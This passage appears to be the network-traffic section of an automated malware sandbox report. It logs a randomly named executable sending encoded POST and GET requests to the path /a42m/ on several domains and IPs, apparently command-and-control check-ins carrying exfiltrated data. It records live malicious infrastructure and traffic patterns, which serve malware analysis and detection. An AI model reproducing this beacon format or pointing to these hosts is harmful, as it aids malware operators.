                          Data Raw: 46 46 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 [TRUNCATED]
                          Data Ascii: FFA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.5 | 53668 | 63.250.43.147 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:57.073312044 CEST | 1778 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.fidyart.com
                          Origin: http://www.fidyart.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.fidyart.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 65 54 79 59 34 62 2b 54 6a 43 63 6b 37 57 56 31 78 2f 71 43 63 4a 75 33 31 37 71 4a 61 41 66 67 47 73 32 59 30 33 6b 4d 57 6e 35 7a 36 36 47 39 46 38 46 6b 68 4a 46 69 75 69 7a 6f 72 32 38 79 6a 6c 36 6f 4f 43 63 33 4c 49 32 37 45 68 4f 35 32 67 4b 4f 67 45 54 6c 6c 34 33 4f 4e 7a 6b 49 69 37 33 51 35 4e 4a 78 78 49 7a 35 66 2b 30 31 44 51 61 4b 70 72 69 70 45 53 75 6d 55 71 70 61 44 79 67 2f 36 75 33 41 75 4c 46 44 46 36 33 39 73 4a 41 77 77 31 39 76 58 43 48 35 79 57 50 34 33 56 52 6b 51 6c 45 50 75 69 39 51 72 67 32 56 43 65 71 32 7a 6b 70 54 30 30 30 56 30 6b 79 2f 71 70 6f 62 52 2b 43 73 30 4d 48 73 41 37 56 68 47 6e 36 77 4f 74 4c 38 44 64 32 33 31 70 47 44 63 78 33 6c 75 61 2f 66 65 4f 69 76 6c 4a 56 64 79 4c 59 30 73 37 42 63 46 6c 6d 42 65 74 69 57 5a 51 44 34 68 6d 54 43 4b 57 70 58 70 32 45 47 65 30 35 34 4f 59 52 55 6d 47 66 45 72 32 5a 7a 6f 57 2b 4e 52 53 46 31 33 33 67 74 76 4a 6a 43 7a 54 53 34 6e 52 34 38 59 4c 35 50 53 63 59 66 46 4c 47 5a 54 51 67 64 78 2b 50 6f 69 6b [TRUNCATED]
                          Data Ascii: vH5= [TRUNCATED]
                          May 23, 2024 15:17:57.665044069 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:17:57 GMT
                          transfer-encoding: chunked
                          connection: close
                          Data Raw: 33 46 42 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 [TRUNCATED]
                          Data Ascii: 3FBA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64, [TRUNCATED]


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          16 | 192.168.2.5 | 53669 | 63.250.43.147 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:59.603785038 CEST | 481 | OUT | GET /a42m/?vH5=TRa47sC0zg9DwlJApIa9TKXT0LmdSyPROaHr8XI2UWJs85O5KJ5vgIdD5G7YtksjxwnhYTkQf9KJFjTFonbd3AHZxsuWNHNjjLjlx6sM8JLXfuIwaQjmht/eByOeQ7cAZg==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.fidyart.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:18:00.206727982 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:18:00 GMT
                          transfer-encoding: chunked
                          connection: close


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.5 | 53670 | 89.31.143.90 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:06.214078903 CEST | 753 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.leaflearn.store
                          Origin: http://www.leaflearn.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.leaflearn.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=n+eOjItH8REx0geVzWu2tLPMKieVtliFpoPYgYvvn/nG0wofLahhIlsqIHNS2BoqEscZS43kd4HFYk859mPDGxz4zoAytDkVU2xpZecDa6qwHbk/l0UbBvV3gUijRLhEtx+T0qztQHz/up8E4BxhFKpuTlDZ+kR+NokB8KTMB/pxMvDEXOP12fvB2Lw1luCUBNNnsWg=
                          May 23, 2024 15:18:06.857809067 CEST | 735 | IN | HTTP/1.1 405 Not Allowed
                          Date: Thu, 23 May 2024 13:18:06 GMT
                          Content-Type: text/html
                          Content-Length: 556
                          Connection: close
                          Server: UD Webspace 3.2
                          Allow: GET, POST, HEAD
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.5 | 53671 | 89.31.143.90 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:08.747181892 CEST | 773 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.leaflearn.store
                          Origin: http://www.leaflearn.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.leaflearn.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=n+eOjItH8REx7guVgx62srPLXSeVnFiBpoLYgaD/kNDG1SgfKYZhbVsqDnNTyBohEshuS5Lkd+rFYlM59VXEHhz+oYA0yTkVU2xpZeJWa6SwEvg/3VUcf/V0lkijAbhAtx/80oHHQC3/uoME4VliPKpsXlCYzXsoNYMe08iUBe1zA5uuNsHdl/D5mY4C0ej9budXyB1VOEuGoIahf73T2MK7mg7F
                          May 23, 2024 15:18:09.397471905 CEST | 735 | IN | HTTP/1.1 405 Not Allowed
                          Date: Thu, 23 May 2024 13:18:09 GMT
                          Content-Type: text/html
                          Content-Length: 556
                          Connection: close
                          Server: UD Webspace 3.2
                          Allow: GET, POST, HEAD
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          19 | 192.168.2.5 | 53672 | 89.31.143.90 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:11.278501987 CEST | 1790 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.leaflearn.store
                          Origin: http://www.leaflearn.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.leaflearn.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=n+eOjItH8REx7guVgx62srPLXSeVnFiBpoLYgaD/kNLG0h4fL5ZhYVsqAnNWyBowEsJqS5GGd9fFZHE50EXEOhz+g4A1tDk6U2htZeZWa6SwEpM/h0Ucd/V3gUinRLhot1rG0oD9Rx//r4cE6jZiHKpUaFDLzXh2Neoa04q+BZZzEN3TYc2B/tHKmIwTpLDgRcdYvDlFCUy+vtiaWI2Ir46hhHeeGvuX/jwCavrjDEkyg/I3+ENbCTHAx4g1v/dFPdH4pA3leywidQABM3eI6H/hqAfTPYd2ZRFhdjZIgXD5p2jjCrJYHvb6ziv9f8nLotKEwqZOwNUFGTTh5kJ4SAZ8tm4CSjfbXx7xS2ausvvzgR7x3T8X1kpLFQgAObkqp8p/d833lcFhkcL4NIPFQkOy4Dc9a3th25i1iZ4Z7NhzBU4d627YEurT2QJX1vl8PYI4nFH2j99/Y8XZBw7jVWAZHGY8rECmje89FM8iqPY8ObWi1nOd2b4JFYyCfwGxrossszxfYfGIuQZ7o1a25GscFBjF4KervQZf08mIkBqGpdeIJjho4f5UqSXYBvXekrftwjSy3jFBrtnNS6rbDsvewWSEYJfPuOcRkkvCfLJg+WZqZEIIarUuMslHjRzWj/wSgIEVORL5Dc8YG9wEivDS8qvpbBmZ9vkL49fb1O0TV2pYadnrs2bRhSx1G2P8B3tbHzjJDSzGNxOGVz4lV8YtYG+sPZ7dJRYW3Az/MK65M1zWiUrIOI8PDVoDCbxTzOSkm6ga56fSshTzS5H4ekDdd9wZoezFRU3wdfECpK6GXJtZfG/W6Adc3Ptr/E1494BUMfpWkviPBRNNPwy2nn0ICo0UD/DrbGGyc+qnB0GkZ7v1vp9ps+ARcb3mOBHtFu9n0FCq7xUd7sqYd0rPLmECivBw+gaD94NWYdyXoAdr6AUAZwNvG/Yw5g4GpwBJVWRoIsyCwvNs/Ybq0aJbXuWP6UzmcUi8BIFkjsRaDyzv1XMz [TRUNCATED]
                          May 23, 2024 15:18:11.916659117 CEST | 735 | IN | HTTP/1.1 405 Not Allowed
                          Date: Thu, 23 May 2024 13:18:11 GMT
                          Content-Type: text/html
                          Content-Length: 556
                          Connection: close
                          Server: UD Webspace 3.2
                          Allow: GET, POST, HEAD
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          20 | 192.168.2.5 | 53673 | 89.31.143.90 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:13.806008101 CEST | 485 | OUT | GET /a42m/?R0nl4=f64p&vH5=q82ug4hJ4iMW1QeZ+GCgoJbZS3jVtW+Vvu2ntYvjkNah5D8fKd1XYREKBHF28ngiXJtWR4/9FoDVe0EJ2zKZXh/HzsdFhnk2W05Rc4EGYuWHBokuuF9nEMUprlqBVZ4vog== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.leaflearn.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:18:14.434719086 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Thu, 23 May 2024 13:18:14 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: close
                          Server: UD Webspace 3.2
                          Data Ascii: 19e0<!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,html{height:100%;margin:0;padding:0;background-color:#fff;font-family:Arial,Verdana,sans-serif}body{text-align:center;background-color:#f0f2f3}.spacerTop{margin-top:40px}a:focus,a:hover,a:link,a:visited{margin:0;padding:0;border:none}.dvLink:focus,.dvLink:hover,.dvLink:link,.dvLink:visited{background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAJCAYAAAARml2dAAAAHklEQVQImWNgqDzxn6HyxH8GDACToIckhYLIEmgAAAHCOEFxKWXwAAAAAElFTkSuQmCC') right center no-repeat;padding-right:12px;border:0 none;text-decoration:none;font-weight:400;color:#0079c8}.dvLink:hover{text-decoration:underline}.dvLink.no-ico{background:0 0;padding:0}.logo-wrapper{width:100%;background-color:#fff;padding:55px 0}#logo{margin:0 auto;width:600px;height:50px;background-position:left [TRUNCATED]


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          21 | 192.168.2.5 | 53674 | 154.55.135.138 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:21.112389088 CEST | 756 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.p65cq675did.shop
                          Origin: http://www.p65cq675did.shop
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.p65cq675did.shop/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=iS4ohAZhyodJI3hpk82C+WZsZAyOhELcso/lcw4+F4HOyDjm9h7KV4BAXqGJiNJuV5Gq8zDHoCCpMpMfl636TNStYIH3qWGw3hv0E8LIhjm1Y8Ua4GrexpRaHt/FAlHLW+9SZBhqxpLOfq+FlwafFT/KdTV26GGwyCfihnxDqkoZC1uzlnAaz87zVNp6c7QAjXKy+9s=


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          22 | 192.168.2.5 | 53675 | 154.55.135.138 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:25.089087009 CEST | 776 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.p65cq675did.shop
                          Origin: http://www.p65cq675did.shop
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.p65cq675did.shop/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=iS4ohAZhyodJKXRpjbqC42ZtFQyOvULYsozlcxsuQazOyiTm6kbKZYBAcKGMmNJlV5KI82jHoDmpMpcflIf5RdTLBYH1uWGw3hv0E8vuhj+1Yska5kPdt5RZPN/FLFHPW+8HZEBExrjOfomFkhacSD/QXzV451fVoQDb9X5F/kQBOjDZ/FIygcXLFehNNLxp50aCgq6F6SRTodpUzIgIjzoUHtuc


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          23 | 192.168.2.5 | 53676 | 154.55.135.138 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:27.621287107 CEST | 1793 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.p65cq675did.shop
                          Origin: http://www.p65cq675did.shop
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.p65cq675did.shop/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          24 | 192.168.2.5 | 53677 | 154.55.135.138 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:30.153161049 CEST | 486 | OUT | GET /a42m/?vH5=vQQIiwhFgpVoGnhhtc2P1VILfyaWtEv7qbiLczs1d6+poiTW6QrgALxDe+CMs+NuEeSHyk/V30WhMaxjncGhKZCgCMKVtFum7SXMM5CUlA+qFcg/x36UpY0MC+LaLW6wHA==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.p65cq675did.shop
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          25 | 192.168.2.5 | 53678 | 104.194.9.31 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:56.850543022 CEST | 768 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.digitoxmarketing.com
                          Origin: http://www.digitoxmarketing.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.digitoxmarketing.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=c6IUh8w1xKAXy8qHlihcJHSD8SNd7lvhx85tLy1mFAbk6e2P0daObLyMjcG7EhuuG1VSniMNdGagMLoCq2vNZ1WF93B7Cull5fFKGi47SHBWpEmXfupAwJP0SMSiVdjoqfxM4bcQuk+O75yqHm3RYrZUMk6S8we/G+amg00z/wDhyHeD8in1sab6/+43zjfgYLqhCtI=
                          May 23, 2024 15:18:57.768744946 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=63ca0da697d2750f9c5521ccdb3312356640a39c55160d7b7c02c575c995ccab; expires=Tue, 19-Nov-2024 13:18:57 GMT; Max-Age=15552000; path=/
                          link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"
                          transfer-encoding: chunked
                          content-encoding: br
                          vary: Accept-Encoding
                          date: Thu, 23 May 2024 13:18:57 GMT
                          server: LiteSpeed


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          26 | 192.168.2.5 | 53679 | 104.194.9.31 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:18:59.452174902 CEST | 788 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.digitoxmarketing.com
                          Origin: http://www.digitoxmarketing.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.digitoxmarketing.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=c6IUh8w1xKAXydaH2zhcPnSAhiNdiVumx8FtL2s5FyPk68uPmJOOWryMo8G+ZxvgG1JanmMNdFmgMPgCpEHKaFWDlHB5MOll5fFKGhEVSHJWp3+XfPpDs5P3EcSiRdjsqfxi4fdLum2O78WqH33QWrZSIk7uygHYc9KvrHpyvA3v+RzpmAvd/63CvtwAiT+JCo6Rc6eC3DZ075BhLGFC9Rkc/Meb
                          May 23, 2024 15:19:00.353271961 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=a7abf01be0dad0e110c65e58536e3ca658c8283c8d5bcb8df9add79ef8f791ea; expires=Tue, 19-Nov-2024 13:19:00 GMT; Max-Age=15552000; path=/
                          link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"
                          transfer-encoding: chunked
                          content-encoding: br
                          vary: Accept-Encoding
                          date: Thu, 23 May 2024 13:19:00 GMT
                          server: LiteSpeed


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          27 | 192.168.2.5 | 53680 | 104.194.9.31 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:19:02.005714893 CEST | 1805 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.digitoxmarketing.com
                          Origin: http://www.digitoxmarketing.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.digitoxmarketing.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:19:02.923065901 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          x-powered-by: PHP/7.4.33
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          content-type: text/html; charset=UTF-8
                          set-cookie: pbid=a31f00fc16b0f85f09508c61c4210a7a3b6cab4e71ea1aab3538c6d4b522c7cf; expires=Tue, 19-Nov-2024 13:19:02 GMT; Max-Age=15552000; path=/
                          link: <https://digitoxmarketing.com/wp-json/>; rel="https://api.w.org/"
                          transfer-encoding: chunked
                          content-encoding: br
                          vary: Accept-Encoding
                          date: Thu, 23 May 2024 13:19:02 GMT
                          server: LiteSpeed


